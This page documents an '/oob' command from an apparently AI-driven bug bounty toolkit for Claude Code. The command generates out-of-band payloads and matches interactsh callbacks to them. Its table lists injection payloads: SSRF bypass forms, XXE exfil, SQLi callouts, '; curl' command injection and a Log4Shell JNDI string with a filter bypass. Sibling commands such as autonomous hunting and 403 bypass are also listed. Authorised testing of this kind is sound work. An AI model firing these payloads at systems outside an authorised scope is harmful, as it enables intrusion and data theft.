/oob
Out-of-band orchestrator — confirm BLIND SSRF/XXE/SQLi/RCE/Log4Shell by correlating interactsh callbacks to the payload that fired them. Usage: /oob --payloads <oob-domain> [--class ssrf,sqli] | /oob --listen | /oob --correlate inter.jsonl --payloads-file p.json
$ npx -y skills add shuvonsec/claude-bug-bounty --agent claude-codeHow it fires
How this command gets triggered: by you, by Claude, or both.
- Fires itselfClaude auto-loads it when your prompt matches the work.
- You can call itInvoke it directly when you want it.
- Slash command
/oob
Context preview
What this command does when you run it.
Out-of-band orchestrator — confirm BLIND SSRF/XXE/SQLi/RCE/Log4Shell by correlating interactsh callbacks to the payload that fired them. Usage: /oob --payloads <oob-domain> [--class ssrf,sqli] | /oob --listen | /oob --correlate inter.jsonl --payloads-file p.json
Command definition
oob.mddescription: Out-of-band orchestrator — confirm BLIND SSRF/XXE/SQLi/RCE/Log4Shell by correlating interactsh callbacks to the payload that fired them. Usage: /oob --payloads <oob-domain> [--class ssrf,sqli] | /oob --listen | /oob --correlate inter.jsonl --payloads-file p.json
/oob
Confirm **blind** vulnerabilities that have no in-band signal. Wraps ProjectDiscovery's `interactsh-client`: generates payloads embedding a unique OOB hostname per injection point, then correlates inbound DNS/HTTP/SMTP interactions back to the exact payload — turning un-provable blind bugs into confirmed ones.
> Needs `interactsh-client` installed (`/arsenal interactsh-client` for the > install hint). Payload generation + correlation work offline without it.
Usage
# 1. start the listener (prints your OOB domain, streams interactions as JSON)
/oob --listen > inter.jsonl
# 2. generate payloads for that domain and inject them into the target
/oob --payloads cXXXX.oast.fun --class ssrf,xxe,sqli
# 3. correlate received callbacks to the payload that caused them
/oob --correlate inter.jsonl --payloads-file payloads.json
Run directly:
tools/oob_listener.py --payloads cXXXX.oast.fun --json > payloads.json
tools/oob_listener.py --listen > inter.jsonl
tools/oob_listener.py --correlate inter.jsonl --payloads-file payloads.json
Classes covered
| Class | Sample payload | |---|---| | blind SSRF | `http://<uid>.<oob>/` (+ `@127.0.0.1`, gopher bypass forms) | | blind XXE | `<!ENTITY x SYSTEM "http://<uid>.<oob>/x">` + OOB-DTD exfil | | blind SQLi | MSSQL `xp_dirtree`, MySQL `LOAD_FILE`, Oracle `UTL_HTTP`, Postgres `COPY…PROGRAM` | | blind RCE | `; curl http://<uid>.<oob>/`, `$(…)`, backticks, `\| ping`, PowerShell | | Log4Shell | `${jndi:ldap://<uid>.<oob>/a}` (+ `${lower:j}` filter bypass) |
Why this is the highest-leverage addition
Without OOB, the agent **cannot confirm** blind SSRF/XXE/SQLi/RCE — an entire band of Critical bugs was structurally out of reach. Each payload carries a unique marker (`ssrf-<random>.<oob>`) so a received callback proves *which* injection point fired, ready to drop straight into a report.
Read more
description: Out-of-band orchestrator — confirm BLIND SSRF/XXE/SQLi/RCE/Log4Shell by correlating interactsh callbacks to the payload that fired them. Usage: /oob --payloads <oob-domain> [--class ssrf,sqli] | /oob --listen | /oob --correlate inter.jsonl --payloads-file p.json
/oob
Confirm **blind** vulnerabilities that have no in-band signal. Wraps ProjectDiscovery's `interactsh-client`: generates payloads embedding a unique OOB hostname per injection point, then correlates inbound DNS/HTTP/SMTP interactions back to the exact payload — turning un-provable blind bugs into confirmed ones.
> Needs `interactsh-client` installed (`/arsenal interactsh-client` for the > install hint). Payload generation + correlation work offline without it.
Usage
# 1. start the listener (prints your OOB domain, streams interactions as JSON) /oob --listen > inter.jsonl # 2. generate payloads for that domain and inject them into the target /oob --payloads cXXXX.oast.fun --class ssrf,xxe,sqli # 3. correlate received callbacks to the payload that caused them /oob --correlate inter.jsonl --payloads-file payloads.json
Run directly:
tools/oob_listener.py --payloads cXXXX.oast.fun --json > payloads.json tools/oob_listener.py --listen > inter.jsonl tools/oob_listener.py --correlate inter.jsonl --payloads-file payloads.json
Classes covered
| Class | Sample payload | |---|---| | blind SSRF | `http://<uid>.<oob>/` (+ `@127.0.0.1`, gopher bypass forms) | | blind XXE | `<!ENTITY x SYSTEM "http://<uid>.<oob>/x">` + OOB-DTD exfil | | blind SQLi | MSSQL `xp_dirtree`, MySQL `LOAD_FILE`, Oracle `UTL_HTTP`, Postgres `COPY…PROGRAM` | | blind RCE | `; curl http://<uid>.<oob>/`, `$(…)`, backticks, `\| ping`, PowerShell | | Log4Shell | `${jndi:ldap://<uid>.<oob>/a}` (+ `${lower:j}` filter bypass) |
Why this is the highest-leverage addition
Without OOB, the agent **cannot confirm** blind SSRF/XXE/SQLi/RCE — an entire band of Critical bugs was structurally out of reach. Each payload carries a unique marker (`ssrf-<random>.<oob>`) so a received callback proves *which* injection point fired, ready to drop straight into a report.
AI-powered bug bounty hunting from your terminal - recon, 20 vuln classes, autonomous hunting, and report generation. All inside Claude Code.
Repo: shuvonsec/claude-bug-bounty
Other commands on claude-bug-bounty.
- /arsenal
Show which external bug-bounty tools are installed on this machine and print install hints for the missing ones. Curated from high-signal repos. Use to bootstrap a fresh box or audit which optional capabilities are wired in. Usage: /arsenal | /arsenal <tool-name>
Open command - /autopilot
Run autonomous hunt loop on a target — scope check → recon → rank surface → hunt → validate → report with configurable checkpoints. Usage: /autopilot target.com [--paranoid|--normal|--yolo]
Open command - /breach-check
HIBP k-anonymity check on a password wordlist. Enriches each password with its breach count, ranks DESC. Free API (no key), only first 5 chars of SHA-1 sent. Output -> <input>-ranked.txt. Usage /breach-check <wordlist> [--min-count N] [--max-count N] [--with-counts]
Open command - /bypass-403
Probe a 403/401 endpoint with the most-paid bypass tricks (header injection, path encoding, method swap, WAF fingerprint, vendor-specific). Wraps byp4xx when installed; otherwise runs a built-in matrix of 38+ techniques. Usage: /bypass-403 <url> | /bypass-403 -l <urls-file>
Open command - /chain
Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth. Usage: /chain
Open command - /cloud-recon
Sweep cloud assets for a target — public S3/Azure/GCP buckets via S3Scanner and cloud_enum, plus CloudFlare-bypassed origin IPs via CloudFail (or built-in DNS-history fallback). Use --keyword for storage discovery and --cf-bypass to find an origin IP behind CloudFlare. Usage:
Open command

